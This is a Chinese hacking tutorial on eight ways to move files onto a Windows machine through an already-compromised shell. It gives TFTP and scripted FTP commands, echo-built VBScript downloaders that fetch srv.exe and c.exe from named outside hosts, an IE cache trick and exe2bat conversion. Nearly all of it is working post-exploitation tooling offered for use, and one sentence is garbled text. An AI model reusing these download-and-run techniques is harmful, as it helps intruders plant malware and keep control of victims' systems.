文件上传八大法-远程控制必看
本文是居于已经得到了一个有一定权限的SHELL.命令行下传送文件的其他方法.
一,TFTP
格式:tftp -i get file.exe path/file.exe 默认存放在system32下,如果指定就存在指定的地方。
二:ftp下载文件
ftp下载文件一般步骤如下:
echo open xxx.xxx.xxx.xxx 〉ftp.txt
echo user 〉〉ftp.txt
echo password 〉〉ftp.txt
echo binary 〉〉ftp.txt [可选]
echo get srv.exe 〉〉ftp.txt
echo bye 〉〉ftp.txt
ftp -s:ftp.txt(这一步是关键哟)
del ftp.txt
这样srv.exe文件拖略谙吕戳恕1Vrv.exe已经存在指定位置。
四:写程序下载
脚本是非常好的东西,只要把源码保存到一个文件中就能运行。所以在shell下,用echo语句直接写到一个文件中,在用相应的解释程序执行就可以啦。这里是一个程序实例的简化:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") 〉webdown.vbs
echo xPost.Open "GET","http://txhak.126.com/srv.exe",0 〉〉webdown.vbs
echo xPost.Send() 〉〉webdown.vbs
echo Set sGet = CreateObject("ADODB.Stream") 〉〉webdown.vbs
echo sGet.Mode = 3 〉〉webdown.vbs
echo sGet.Type = 1 〉〉webdown.vbs
echo sGet.Open() 〉〉webdown.vbs
echo sGet.Write(xPost.responseBody) 〉〉webdown.vbs
echo sGet.SaveToFile "srv.exe",2 〉〉webdown.vbs
然后执行cscript webdown.vbs就可以啦。其中,http://txhak.126.com/srv.exe改成你放文件的网站路径,srv.exe可以改成保存文件的路径。 这里ADODB.Stream很重要如果目标机隔离了adodb.stream就会不成功。
五:START ITS:HTTP://IP/文件名
然后cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\"
然后DIR 文件名[1]
注意:那串长文件名要用""引起来,因为有空格
例子:C:\Documents and Settings\Administrator〉start its:http://xxx.xxx.xxx.xxx/srv.
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1 的目录
2003-11-22 17:48 12,832 srv[1].exe
1 个文件 12,832 字节
列出所有文件:
1 个文件 12,832 字节
0 个目录 6,425,985,024 可用字节
C:\Documents and Settings\Administrator〉copy C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1\srv[1].exe c:\srv.exe
已复制 1 个文件
六。一句话下载。第4种方法的精简,有时很有用的
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://soft.163vv.com/77169/c.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 〉pig.vbs
七。写程序下载
echo iLocal = LCase(WScript.Arguments(1)) 〉c:\down.vbs
echo iRemote = LCase(WScript.Arguments(0)) 〉〉c:\down.vbs
echo Set xPost = CreateObject("Microsoft.XMLHTTP") 〉〉c:\down.vbs
echo xPost.Open "GET",iRemote,0 〉〉c:\down.vbs
echo xPost.Send() 〉〉c:\down.vbs
echo Set sGet = CreateObject("ADODB.Stream") 〉〉c:\down.vbs
echo sGet.Mode = 3 〉〉c:\down.vbs
echo sGet.Type = 1 〉〉c:\down.vbs
echo sGet.Open() 〉〉c:\down.vbs
echo sGet.Write(xPost.responseBody) 〉〉c:\down.vbs
echo sGet.SaveToFile iLocal,2 〉〉c:\down.vbs
八.exe2bat命令行下输入,debug还原成文件
用exe2bat这个工具把exe文件转化成bat,然后一行行敲进去,这样工作量非常大,只适合于非常短小的文件。